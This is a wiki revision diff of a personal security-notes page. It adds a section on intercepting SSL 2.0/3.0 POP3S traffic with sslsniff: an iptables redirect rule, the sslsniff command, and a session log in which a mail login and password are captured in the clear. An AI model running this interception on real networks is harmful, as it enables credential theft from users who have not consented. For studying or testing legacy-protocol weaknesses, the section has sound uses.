This shows you the differences between two versions of the page.
Both sides previous revisionPrevious revision | Next revisionBoth sides next revision | ||
fuss:security [2018/08/31 16:17] – [Blocking SemrushBot] office | fuss:security [2019/04/29 22:44] – [Varnish and Fail2Ban] office | ||
---|---|---|---|
Line 89: | Line 89: | ||
< | < | ||
NOTICE [varnish-badbots] Ban 46.229.168.68 | NOTICE [varnish-badbots] Ban 46.229.168.68 | ||
+ | </ | ||
+ | |||
+ | ====== Intercept SSL 2.0 / SSL 3.0 Using SSLsniff ====== | ||
+ | |||
+ | Redirect SMTPs to custom port for SSLsniff: | ||
+ | <code bash> | ||
+ | iptables -t nat -A PREROUTING -p tcp --destination-port 995 -j REDIRECT --to-ports 4995 | ||
+ | sslsniff -a -c / | ||
+ | </ | ||
+ | |||
+ | Example Session: | ||
+ | < | ||
+ | 1385227016 INFO sslsniff : Added OCSP URL: ocsp.ipsca.com | ||
+ | 1385227016 INFO sslsniff : Certificate Ready: * | ||
+ | sslsniff 0.8 by Moxie Marlinspike running... | ||
+ | 1385227031 DEBUG sslsniff : Read from Server (mail.net.hu) : | ||
+ | +OK POP3 PROXY server ready < | ||
+ | |||
+ | 1385227032 DEBUG sslsniff : Read from Client (mail.net.hu) : | ||
+ | USER harry | ||
+ | |||
+ | 1385227032 DEBUG sslsniff : Read from Server (mail.net.hu) : | ||
+ | +OK Password required | ||
+ | |||
+ | 1385227032 DEBUG sslsniff : Read from Client (mail.net.hu) : | ||
+ | PASS secretpassword | ||
</ | </ | ||